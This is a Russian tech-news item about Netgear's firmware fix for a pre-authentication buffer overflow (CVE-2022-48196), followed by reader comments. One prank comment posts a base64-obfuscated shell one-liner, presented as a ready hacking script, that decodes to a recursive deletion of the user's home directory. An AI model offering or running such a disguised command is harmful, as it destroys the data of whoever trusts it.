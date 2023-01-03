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Уязвимость в устройствах Netgear, эксплуатируемая на стадии до аутентификации

03.01.2023 08:26

Компания Netgear выпустила обновление прошивок к беспроводным маршрутизаторам серий RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7000, R7960P и R8000P, в которых устранена уязвимость (CVE-2022-48196), позволяющая добиться переполнения буфера без прохождения аутентификации. Технические детали и информация о наличии эксплоитов пока не приводится, но судя по выставленному уровню опасности и рекомендации незамедлительно обновить прошивку, проблема напоминает ноябрьскую уязвимость, позволявшую добиться выполнения своего кода с правами root через манипуляции во внешней сети на стороне WAN-интерфейса.

  1. Главная ссылка к новости (https://kb.netgear.com/0000654...)
  2. OpenNews: Уязвимость в маршрутизаторах Netgear, приводящая к удалённому выполнению кода
  3. OpenNews: Уязвимости в устройствах NETGEAR, позволяющие получить доступ без аутентификации
  4. OpenNews: 0-day уязвимость в устройствах Netgear, позволяющая удалённо получить root-доступ
  5. OpenNews: Уязвимости, позволяющие захватить управление коммутаторами Cisco, Zyxel и NETGEAR на чипах RTL83xx
  6. OpenNews: Уязвимость в устройствах Netgear, позволяющая получить управление без аутентификации
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/58421-netgear
Ключевые слова: netgear
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Обсуждение (13) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 09:34, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Готовый скрипт есть у кого? Чтобы сразу запустил, и всех поломал, не вникая в скучные детали?
     
     
  • 2.2, Аноним (2), 09:39, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Да
     
  • 2.3, Аноним (3), 09:39, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Кнопка "сделать мне всё за***сь"? Вернее, "сделать меня кулхацкором"
     
  • 2.6, Аноним (6), 11:53, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    HACK='echo "ZGF0ZQo=" | base64 -d'; sh -c $HACK
     
     
  • 3.11, aploskov.dev (ok), 13:30, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Тогда уж, чтоб запомнилось.

    HACK='echo 'cm0gLXJmICIvaG9tZS8kVVNFUi8qIg==' | base64 -d'; sh -c $HACK

     

  • 1.4, Аноним (4), 10:32, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    хорошая закладка для господина Майора... хорошая.
    Теперь прийдется новую делать - отстой..
     
     
  • 2.8, Аноним (8), 12:31, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    прежнего майора повысили, не гоже оставлять свои наработки для молодняка
     
  • 2.9, Аноним (9), 12:40, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Ты что это же теория заговора, ай-яй-яй. Ты же знаешь что теорий заговора не существует, а тебе должно быть стыдно за то что ты поднял голову и начал ей думать самостоятельно.
     

  • 1.5, InuYasha (??), 11:30, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Эти хоть патчат - и то молодцы.
     
     
  • 2.10, Аноним (9), 12:41, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Только автоапдейта у них них, а так да. Пацана вычислил, а он и не включает заднюю как фраер. Всё по понятиям.
     

  • 1.7, Аноним (7), 11:56, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    >CVE-2022-48196
    >2022

    А обновление выпущено в 2023, а не в тот же день! Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

     
     
  • 2.14, Атон (?), 14:29, 03/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

    Всех, кого нужно, поимели задолго до того.  Так и узнали об уязвимости.

     

  • 1.12, Аноним (-), 14:11, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > переполнения буфера

    Годы идут, но нестареющая классика продолжает радовать людей.

     

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